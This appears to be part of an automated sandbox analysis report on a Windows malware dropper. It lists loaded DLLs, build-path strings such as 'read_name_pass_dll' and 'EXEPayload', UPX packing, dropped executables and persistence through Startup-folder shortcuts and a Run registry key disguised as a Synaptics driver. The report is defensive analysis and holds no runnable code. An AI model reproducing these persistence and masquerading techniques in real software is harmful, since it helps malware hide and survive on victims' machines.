                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mswsock.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winnsi.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: napinsp.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: pnrpnsp.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: wshbth.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: nlaapi.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dnsapi.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: winrnr.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rasadhlp.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: fwpuclnt.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: schannel.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: mskeyprotect.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ntasn1.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: msasn1.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: dpapi.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: rsaenh.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: cryptbase.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: gpapi.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncrypt.dllJump to behavior
                      Source: C:\ProgramData\Synaptics\Synaptics.exeSection loaded: ncryptsslp.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: apphelp.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: version.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: wininet.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: wsock32.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: netapi32.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: uxtheme.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: windows.storage.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: wldp.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: kernel.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: textshaping.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: propsys.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: twext.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: windows.staterepositoryps.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: appresolver.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: bcp47langs.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: slc.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: userenv.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: sppc.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: policymanager.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: msvcp110_win.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: ntshrui.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: sspicli.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: windows.fileexplorer.common.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: iertutil.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: profapi.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: srvcli.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: cscapi.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: netutils.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: twinapi.appcore.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: shacct.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: starttiledata.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: acppage.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: sfc.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: msi.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: aepic.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: ntmarta.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: cryptsp.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: sfc_os.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: idstore.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: samlib.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: wlidprov.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: samcli.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: provsvc.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: edputil.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: urlmon.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: wintypes.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: onecorecommonproxystub.dllJump to behavior
                      Source: C:\Program Files (x86)\2.exeSection loaded: onecoreuapcommonproxystub.dllJump to behavior
                      Source: C:\Program Files (x86)\3.exeSection loaded: apphelp.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: <pi-ms-win-core-fibers-l1-1-0.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: version.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: dxgidebug.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: sfc_os.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: sspicli.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: rsaenh.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: uxtheme.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: dwmapi.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: cryptbase.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: riched20.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: usp10.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: msls31.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: kernel.appcore.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: windowscodecs.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: textshaping.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: ieframe.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: iertutil.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: netapi32.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: userenv.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: winhttp.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: wkscli.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: netutils.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: dataexchange.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: d3d11.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: dcomp.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: dxgi.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: twinapi.appcore.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: urlmon.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: srvcli.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: textinputframework.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: coreuicomponents.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: coremessaging.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: ntmarta.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: wintypes.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: msiso.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: windows.storage.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: wldp.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: mshtml.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: powrprof.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: umpdc.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: srpapi.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: msimtf.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: d2d1.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: dwrite.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: resourcepolicyclient.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: d3d10warp.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: dxcore.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: secur32.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: mlang.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: propsys.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: profapi.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: uiautomationcore.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: winmm.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: mswsock.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: iphlpapi.dll
                      Source: C:\Users\user\Desktop\._cache_2.exeSection loaded: winnsi.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: <pi-ms-win-core-synch-l1-2-0.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: <pi-ms-win-core-fibers-l1-1-1.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: <pi-ms-win-core-localization-l1-2-1.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: version.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: dxgidebug.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: sfc_os.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: sspicli.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: rsaenh.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: uxtheme.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: dwmapi.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: cryptbase.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: riched20.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: usp10.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: msls31.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: kernel.appcore.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: windowscodecs.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: textshaping.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: textinputframework.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: coreuicomponents.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: coremessaging.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: ntmarta.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: wintypes.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: wintypes.dll
                      Source: C:\Program Files (x86)\4.exeSection loaded: wintypes.dll
                      Source: C:\Windows\wic.exeSection loaded: apphelp.dll
                      Source: C:\Windows\wic.exeSection loaded: wininet.dll
                      Source: C:\Windows\wic.exeSection loaded: msimg32.dll
                      Source: C:\Windows\wic.exeSection loaded: uxtheme.dll
                      Source: C:\Windows\wic.exeSection loaded: oledlg.dll
                      Source: C:\Windows\wic.exeSection loaded: oleacc.dll
                      Source: C:\Windows\wic.exeSection loaded: winmm.dll
                      Source: C:\Windows\wic.exeSection loaded: iertutil.dll
                      Source: C:\Windows\wic.exeSection loaded: sspicli.dll
                      Source: C:\Windows\wic.exeSection loaded: windows.storage.dll
                      Source: C:\Windows\wic.exeSection loaded: wldp.dll
                      Source: C:\Windows\wic.exeSection loaded: profapi.dll
                      Source: C:\Windows\wic.exeSection loaded: kernel.appcore.dll
                      Source: C:\Windows\wic.exeSection loaded: ondemandconnroutehelper.dll
                      Source: C:\Windows\wic.exeSection loaded: winhttp.dll
                      Source: C:\Windows\wic.exeSection loaded: iphlpapi.dll
                      Source: C:\Windows\wic.exeSection loaded: mswsock.dll
                      Source: C:\Windows\wic.exeSection loaded: winnsi.dll
                      Source: C:\Windows\wic.exeSection loaded: urlmon.dll
                      Source: C:\Windows\wic.exeSection loaded: srvcli.dll
                      Source: C:\Windows\wic.exeSection loaded: netutils.dll
                      Source: C:\Windows\wic.exeSection loaded: dnsapi.dll
                      Source: C:\Windows\wic.exeSection loaded: fwpuclnt.dll
                      Source: C:\Windows\wic.exeSection loaded: rasadhlp.dll
                      Source: C:\Windows\wic.exeSection loaded: textinputframework.dll
                      Source: C:\Windows\wic.exeSection loaded: coreuicomponents.dll
                      Source: C:\Windows\wic.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\wic.exeSection loaded: ntmarta.dll
                      Source: C:\Windows\wic.exeSection loaded: coremessaging.dll
                      Source: C:\Windows\wic.exeSection loaded: wintypes.dll
                      Source: C:\Windows\wic.exeSection loaded: wintypes.dll
                      Source: C:\Windows\wic.exeSection loaded: wintypes.dll
                      Source: C:\Windows\wic.exeSection loaded: textshaping.dll
                      Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: shutdownext.dll
                      Source: C:\Windows\SysWOW64\shutdown.exeSection loaded: sspicli.dll
                      Source: C:\Windows\cbas.exeSection loaded: apphelp.dll
                      Source: C:\Windows\cbas.exeSection loaded: wininet.dll
                      Source: C:\Users\user\Desktop\file.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Classes\WOW6432Node\CLSID\{057EEE47-2572-4AA1-88D7-60CE2149E33C}\InProcServer32Jump to behavior
                      Source: cbas[1].lnk.11.drLNK file: ..\..\..\Windows\cbas.exe
                      Source: cbas.lnk.11.drLNK file: ..\..\..\Windows\cbas.exe
                      Source: cbas.lnk0.11.drLNK file: ..\..\..\Windows\cbas.exe
                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile written: C:\Users\user\AppData\Local\Temp\aByzSrC.iniJump to behavior
                      Source: C:\Users\user\Desktop\._cache_1.exeAutomated click: OK
                      Source: C:\Users\user\Desktop\._cache_2.exeAutomated click: OK
                      Source: Window RecorderWindow detected: More than 3 window changes detected
                      Source: C:\Users\user\Desktop\._cache_2.exeWindow detected: (&D)C:\ProgramData\Synaptics\Synaptics.exeC:\ProgramData\Synaptics\Synaptics.exe(&W)... (END USER LICENSE AGREEMENT EULA) [] []
                      Source: C:\Users\user\Desktop\._cache_2.exeWindow detected: 1993-2023 Alexander Roshal(&D)C:\ProgramData\Synaptics\Synaptics.exeC:\ProgramData\Synaptics\Synaptics.exe(&W)... (END USER LICENSE AGREEMENT EULA) [] []
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEKey opened: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Office\CommonJump to behavior
                      Source: C:\Program Files (x86)\Microsoft Office\root\Office16\EXCEL.EXEFile opened: C:\Program Files (x86)\Microsoft Office\root\vfs\SystemX86\MSVCR100.dllJump to behavior
                      Source: Binary string: D:\Projects\WinRAR\sfx\build\sfxrar32\Release\sfxrar.pdb source: 4.exe, 00000009.00000000.1765436856.0000000000D54000.00000002.00000001.01000000.00000010.sdmp, 4.exe, 00000009.00000002.1773008826.0000000000D54000.00000002.00000001.01000000.00000010.sdmp, 4.exe, 00000009.00000003.1770403788.000000000589A000.00000004.00000020.00020000.00000000.sdmp, 4.exe, 00000009.00000003.1769414165.000000000574D000.00000004.00000020.00020000.00000000.sdmp, 4[1].exe.0.dr
                      Source: Binary string: \read_name_pass_dll\release\read_name_pass_dll.pdb source: wic.exe, 0000000B.00000003.1823633936.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, msslac[1].dll.11.dr
                      Source: Binary string: \Release\EXEPayload.pdb! source: wic.exe, 0000000B.00000003.1814987251.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, 00000012.00000002.3537228980.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe, 00000012.00000000.1920081415.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe.11.dr
                      Source: Binary string: \Release\EXEPayload.pdb source: wic.exe, 0000000B.00000003.1814987251.00000000016A9000.00000004.00000020.00020000.00000000.sdmp, cbas.exe, 00000012.00000002.3537228980.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe, 00000012.00000000.1920081415.0000000000BD3000.00000002.00000001.01000000.0000001A.sdmp, cbas.exe.11.dr
                      Source: Binary string: \Release\DownLoad.pdb source: wic.exe, 0000000B.00000000.1799136325.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe, 0000000B.00000002.3537726536.0000000001003000.00000002.00000001.01000000.00000018.sdmp, wic.exe.0.dr, wic[1].exe.0.dr
                      Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar32\Release\sfxrar.pdb source: ._cache_2.exe, 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmp, ._cache_2.exe, 00000008.00000000.1762473821.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmp, 2.exe.0.dr, ._cache_2.exe.5.dr, 2[1].exe.0.dr
                      Source: Binary string: D:\Projects\WinRAR\sfx\setup\build\sfxrar32\Release\sfxrar.pdb< source: ._cache_2.exe, 00000008.00000002.1890126915.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmp, ._cache_2.exe, 00000008.00000000.1762473821.0000000000DFB000.00000002.00000001.01000000.0000000F.sdmp, 2.exe.0.dr, ._cache_2.exe.5.dr, 2[1].exe.0.dr
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_00406A20 EntryPoint,LoadLibraryA,GetProcAddress,ExitProcess,VirtualProtect,VirtualProtect,VirtualProtect,0_2_00406A20
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_4196250
                      Source: 3[1].exe.0.drStatic PE information: section name: UPX2
                      Source: 3.exe.0.drStatic PE information: section name: UPX2
                      Source: 4[1].exe.0.drStatic PE information: section name: .didat
                      Source: 4.exe.0.drStatic PE information: section name: .didat
                      Source: ._cache_2.exe.5.drStatic PE information: section name: .didat
                      Source: clxa.exe.9.drStatic PE information: section name: UPX2
                      Source: C:\Users\user\Desktop\file.exeCode function: 0_2_004067A4 push eax; ret 0_2_004067AC
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_004134A1 push edi; ret 2_2_0041351D
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0041356E push edi; ret 2_2_0041351D
                      Source: C:\Users\user\Desktop\._cache_1.exeCode function: 2_2_0040F590 push eax; ret 2_2_0040F5BE
                      Source: C:\Program Files (x86)\3.exeCode function: 7_2_00409CCA push ecx; iretd 7_2_00409CD3
                      Source: C:\Program Files (x86)\3.exeCode function: 7_2_00409D12 push ecx; iretd 7_2_00409CD3
                      Source: C:\Program Files (x86)\3.exeCode function: 7_2_0040962F push es; ret 7_2_00409630
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DF81E1 push ecx; ret 8_2_00DF81F4
                      Source: C:\Users\user\Desktop\._cache_2.exeCode function: 8_2_00DF880F push ecx; ret 8_2_00DF8830
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D407F0 push ecx; ret 9_2_00D40803
                      Source: C:\Program Files (x86)\4.exeCode function: 9_2_00D3FEFC push eax; ret 9_2_00D3FF1A
                      Source: C:\Windows\wic.exeCode function: 11_2_00ECF8FB push ecx; ret 11_2_00ECF8FC
                      Source: C:\Windows\wic.exeCode function: 11_2_00FCBA13 push ecx; ret 11_2_00FCBA26
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB41C6 push ecx; ret 18_2_00BB41D9
                      Source: C:\Windows\cbas.exeCode function: 18_2_00BB3A36 push ecx; ret 18_2_00BB3A49
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1
                      Source: initial sampleStatic PE information: section name: UPX0
                      Source: initial sampleStatic PE information: section name: UPX1

                      Persistence and Installation Behavior

                      barindex
                      Drops PE files to the document folder of the user
                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                      Drops executables to the windows directory (C:\Windows) and starts them
                      Source: unknownExecutable created and started: C:\Windows\cbas.exe
                      Source: C:\Users\user\Desktop\file.exeExecutable created and started: C:\Windows\wic.exeJump to behavior
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\3.exeJump to dropped file
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exeJump to dropped file
                      Source: C:\Program Files (x86)\1.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\2[1].exeJump to dropped file
                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\4.exeJump to dropped file
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cghqi.exeJump to dropped file
                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\HjsFu2ta.exeJump to dropped file
                      Source: C:\Windows\wic.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\msslac[1].dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\YLNGKWRH\3[1].exeJump to dropped file
                      Source: C:\Windows\wic.exeFile created: C:\Windows\cbas.exeJump to dropped file
                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\RCXF308.tmpJump to dropped file
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZJCZETOO\4[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\1.exeJump to dropped file
                      Source: C:\Windows\wic.exeFile created: C:\Windows\msslac.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\1[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\2.exeJump to dropped file
                      Source: C:\Program Files (x86)\1.exeFile created: C:\ProgramData\Synaptics\RCXF181.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\3D003UC5\wic[1].exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\wic.exeJump to dropped file
                      Source: C:\Program Files (x86)\2.exeFile created: C:\Users\user\Desktop\._cache_2.exeJump to dropped file
                      Source: C:\Windows\wic.exeFile created: C:\Users\user\AppData\Local\Microsoft\Windows\INetCache\IE\ZVZFKMB9\cbas[1].exeJump to dropped file
                      Source: C:\Program Files (x86)\1.exeFile created: C:\Users\user\Desktop\._cache_1.exeJump to dropped file
                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\AppData\Local\Temp\RCXF376.tmpJump to dropped file
                      Source: C:\Program Files (x86)\1.exeFile created: C:\ProgramData\Synaptics\Synaptics.exeJump to dropped file
                      Source: C:\Program Files (x86)\1.exeFile created: C:\ProgramData\Synaptics\RCXF181.tmpJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\3.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\1.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\2.exeJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Program Files (x86)\4.exeJump to dropped file
                      Source: C:\Windows\wic.exeFile created: C:\Windows\cbas.exeJump to dropped file
                      Source: C:\Windows\wic.exeFile created: C:\Windows\msslac.dllJump to dropped file
                      Source: C:\Users\user\Desktop\file.exeFile created: C:\Windows\wic.exeJump to dropped file
                      Source: C:\ProgramData\Synaptics\Synaptics.exeFile created: C:\Users\user\Documents\~$cache1Jump to dropped file
                      Source: C:\Windows\wic.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\cbas.lnk
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\__tmp_rar_sfx_access_check_4196250
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\bykcxw.exe
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cghqi.exe
                      Source: C:\Program Files (x86)\4.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\clxa.exe
                      Source: C:\Windows\wic.exeFile created: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\StartUp\cbas.lnk
                      Source: C:\Windows\wic.exeFile created: C:\Users\User\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\cbas.lnk
                      Source: C:\Program Files (x86)\1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                      Source: C:\Program Files (x86)\1.exeRegistry value created or modified: HKEY_LOCAL_MACHINE\SOFTWARE\WOW6432Node\Microsoft\Windows\CurrentVersion\Run Synaptics Pointing Device DriverJump to behavior
                      Source: C:\Windows\wic.exeCode function: 11_2_00E83400 IsIconic,SendMessageA,GetSystemMetrics,GetSystemMetrics,GetSystemMetrics,GetClientRect,DrawIcon,11_2_00E83400
                      Source: C:\Windows\wic.exeCode function: 11_2_00EA2B33 IsIconic,11_2_00EA2B33
